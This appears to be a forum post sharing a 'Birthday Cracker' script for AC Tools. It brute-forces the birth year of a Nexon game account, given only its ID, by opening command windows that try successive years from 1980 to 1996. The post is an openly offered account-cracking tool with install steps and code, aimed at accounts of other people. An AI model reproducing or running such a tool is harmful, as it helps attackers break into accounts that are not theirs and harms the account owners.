Birthday Cracker

this allows you to crack an account's birthday by only having the Nexon ID.

1. Download Active Pearl from ( on bottom of this thread ) this is NEEDED to run the script). Install after download.

Use this script in AC tools and follow the directions in the beginning to make cracking alot faster


// This will open 9 windows (if the interval is 2)
// This starts from 1980 and goes up in 2 year increments to 1996
// It should only take about 10 mins to crack the birthday if you have good internet and the birthday is after 1980
// Make sure that is in C:\
// DIRECTIONS: <-------- READ
// Put your Nexon ID in the "user" constant
// Put the name of your untitled notepad in your langauge in the "notepad" constant.
// Set the interval, the directions for that are under it.

// Don't change these
starter1 = cd C:\ {RETURN}
starter2 =
starter3= 19
year = 80
//Edit these <---------------------- EDIT THESE
notepad= Untitled - Notepad //the name of your untitled notepad in your langauge.
user = // Put in the ID here
yearinterval = 2 // The amount of years you want to skip in intervals
// EX: 1 would make it open windoes with 1980, 1981, 1982, 1983, etc...
// 2 would make it try 1980, 1982, 1984, 1986, etc...
// The default is 2, if you have a fast internet connection, try 1.
// If you have a slow internet, try 3 or 4, and more than that is just to slow.

Call start

Procedure start
ExecProgram cmd.exe
delay 200
Keys $starter1
Keys $starter2
Keys {SPACE}
Keys $user
Keys {SPACE}
Keys $starter3
Keys $year
Compute year = $year + $yearinterval // Add 2 years to the birthday
If $year < 97 // Check what birthday it is at.
Call reset
Delay 700
ExecProgram notepad.exe
SetActiveWindow $Notepad
Keys All birthday's are being tried currently;
Keys Unfortunately you have to manually check the windows to see if one worked. (in about 10 minuets)

Procedure reset
delay 1000
Call start
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Got any more problems? Reply in this thread and I'll try to help you.